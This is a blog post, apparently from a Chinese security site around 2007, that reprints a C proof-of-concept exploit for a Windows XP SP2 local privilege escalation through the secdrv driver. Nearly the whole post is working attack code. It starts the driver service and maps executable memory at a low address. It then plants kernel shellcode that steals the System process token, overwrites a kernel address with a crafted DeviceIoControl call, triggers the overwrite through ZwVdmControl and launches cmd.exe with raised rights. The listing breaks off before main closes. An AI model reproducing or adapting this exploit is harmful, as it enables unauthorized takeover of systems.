Windows Local Privilege Escalation Vulnerability Exploit

    [晴 November 13, 2007 16:36 | by ]
Author:  Polymorphours
Email:   Polymorphours@whitecell.org
Homepage:http://www.whitecell.org
Date:    2007-10-23



#include
#include

#pragma comment (lib, "ntdll.lib")

typedef LONG NTSTATUS;

#define STATUS_SUCCESS  ((NTSTATUS)0x00000000L)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)

typedef struct _IMAGE_FIXUP_ENTRY {

    WORD    offset:12;
    WORD    type:4;
} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;

typedef struct _UNICODE_STRING {

  USHORT Length;
  USHORT MaximumLength;
  PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

typedef enum _SYSTEM_INFORMATION_CLASS {

  SystemModuleInformation=11,
} SYSTEM_INFORMATION_CLASS;



typedef struct _SYSTEM_MODULE_INFORMATION { // Information Class 11

  ULONG Reserved[2];
  PVOID Base;
  ULONG Size;
  ULONG Flags;
  USHORT Index;
  USHORT Unknown;
  USHORT LoadCount;
  USHORT ModuleNameOffset;
  CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;


NTSTATUS
(NTAPI *NtAllocateVirtualMemory)(
  IN HANDLE ProcessHandle,
  IN OUT PVOID *BaseAddress,
  IN ULONG ZeroBits,
  IN OUT PULONG AllocationSize,
  IN ULONG AllocationType,
  IN ULONG Protect
  );


VOID
SetShellCodeToMemory(
  PVOID  ShellCodeMemory
  )
{
  OSVERSIONINFOEX  OsVersionInfo;

  RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) );
  OsVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
  GetVersionEx ((OSVERSIONINFO *) &OsVersionInfo);

  if ( OsVersionInfo.dwMajorVersion != 5 ) {

    printf( "Not NT5 system\n" );
    ExitProcess( 0 );
    return;
  }

  if ( OsVersionInfo.dwMinorVersion == 1 ) {
  
    __asm {

      call CopyXpShellCode

      nop
      nop
      nop
      nop
      nop
      nop

      mov  eax,0xFFDFF124  // eax = KPCR    (not 3G Mode)
      mov eax,[eax]

      mov  esi,[eax+0x220]
      mov  eax,esi

    searchXp:

      mov  eax,[eax+0x88]
      sub  eax,0x88
      mov  edx,[eax+0x84]
      cmp  edx,0x4  // Find System Process
      jne  searchXp

      mov  eax,[eax+0xc8]  // 获取system进程的token
      mov  [esi+0xc8],eax  // 修改当前进程的token

      ret 8
        
  CopyXpShellCode:
      pop esi
      mov edi, ShellCodeMemory
      lea ecx, CopyXpShellCode
      sub ecx, esi
      cld
      rep movsb
    }
  
  }

}

int main(int argc, char* argv[])
{
  NTSTATUS  status;
  PVOID  ZwVdmControl = NULL;
  DWORD  HookAddress = 0x804E3AD8;  // test by xp sp2
  PVOID  ShellCodeMemory = (PVOID)0x200;
  DWORD  MemorySize = 0x1000;

  HANDLE  deviceHandle;
  DWORD  dwReturnSize = 0;

  SC_HANDLE  hscmHandle = NULL;
  SC_HANDLE  hscDriver = NULL;

  PROCESS_INFORMATION      pi;
  STARTUPINFOA        stStartup;
  PVOID    InputBuffer = NULL;

  printf( "\tWindows Local Privilege Escalation Vulnerability Exploit 0day (POC)\n" );
  printf( "Create by Whitecell's Polymorphours@whitecell.org 2007/04/15\n" );
  printf( "TEST OS: WINDOWS XP SP2\n" );

  printf( "[*] Connect SCM ... " );

  hscmHandle = OpenSCManager ( NULL, NULL, GENERIC_READ | SERVICE_START );
  if ( NULL == hscmHandle ) {
  
    printf( "failed, code: %d\n", GetLastError() );
    return 0;
  }

  printf( "success!!\n" );
  printf( "[*] Open services ... " );

  hscDriver = OpenService( hscmHandle, "secdrv", GENERIC_READ | SERVICE_START );
  if ( NULL == hscDriver ) {
  
    printf( "failed, code: %d\n", GetLastError() );
    CloseServiceHandle ( hscmHandle );
    return 0;
  }

  printf( "success!!\n" );
  printf( "[*] Start services ... " );

  //
  // 启动secdrv驱动
  //

  if ( !StartService( hscDriver, 0, NULL ) ) {
  
    if ( ERROR_SERVICE_ALREADY_RUNNING != GetLastError() ) {

      printf( "failed, code: %d\n", GetLastError() );
      CloseServiceHandle ( hscDriver );
      CloseServiceHandle ( hscmHandle );
      return 0;
    }
  }

  printf( "success!!\n" );

  CloseServiceHandle ( hscDriver );
  CloseServiceHandle ( hscmHandle );

  NtAllocateVirtualMemory = (long (__stdcall *)(void *,void ** ,unsigned long,unsigned long *,unsigned long,unsigned

long))GetProcAddress( LoadLibrary("ntdll.dll"), "NtAllocateVirtualMemory" );
  if ( NtAllocateVirtualMemory == NULL ) {
  
    printf( "GetProcAddress failed, code: %d\n" );
    return 0;
  }

  ZwVdmControl = GetProcAddress( LoadLibrary("ntdll.dll"), "ZwVdmControl" );

  printf( "[*] Create execute environment ... " );

  status = NtAllocateVirtualMemory( (HANDLE)-1,
                    &ShellCodeMemory,
                    0,
                    &MemorySize,
                    MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,
                    PAGE_EXECUTE_READWRITE );
  if ( status != STATUS_SUCCESS ) {
  
    printf( "failed!\n[-] NtAllocateVirtualMemory failed, status: %08X\n", status );
    return 0;
  }

  printf( "Ok!\n" );

  //
  // 初始化 ShellCode
  //

  memset( ShellCodeMemory, 0x90, MemorySize );
  SetShellCodeToMemory( (PVOID)((DWORD)ShellCodeMemory + 0x200) );

  deviceHandle = CreateFile("\\\\.\\secdrv",
            0,
            FILE_SHARE_READ|FILE_SHARE_WRITE,
            NULL,
            OPEN_EXISTING,
            0,
            NULL);
  if ( INVALID_HANDLE_VALUE == deviceHandle ) {
  
    printf( "[-] Open device failed, code: %d\n", GetLastError() );
    return 0;
  } else {
  
    printf( "[*] Open device success\n" );
  }

  InputBuffer = LocalAlloc( LPTR, 0x1000 );

  *(PDWORD)InputBuffer = 0x1;
  *(PDWORD)((DWORD)InputBuffer + 0x4) = 0x96;

  DeviceIoControl( deviceHandle,
           0xca002813,
           InputBuffer,
           4,
           (PVOID)HookAddress,
           4,
           &dwReturnSize,  
           NULL );

  CloseHandle( deviceHandle );

  printf( "[*] call shellcode ... " );

  _asm {
  
    xor ecx,ecx
    push ecx
    push ecx
    mov eax, ZwVdmControl
    call eax
  }

  printf( "Done.\n" );
  printf( "[*] Create New Process\n" );

  GetStartupInfo( &stStartup );

  CreateProcess( NULL,
          "cmd.exe",
          NULL,
          NULL,
          TRUE,
          NULL,
          NULL,
          NULL,
          &stStartup,
          &pi );


Bug&Exp | Comments(0) | Trackbacks(0) | Reads(11086)
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive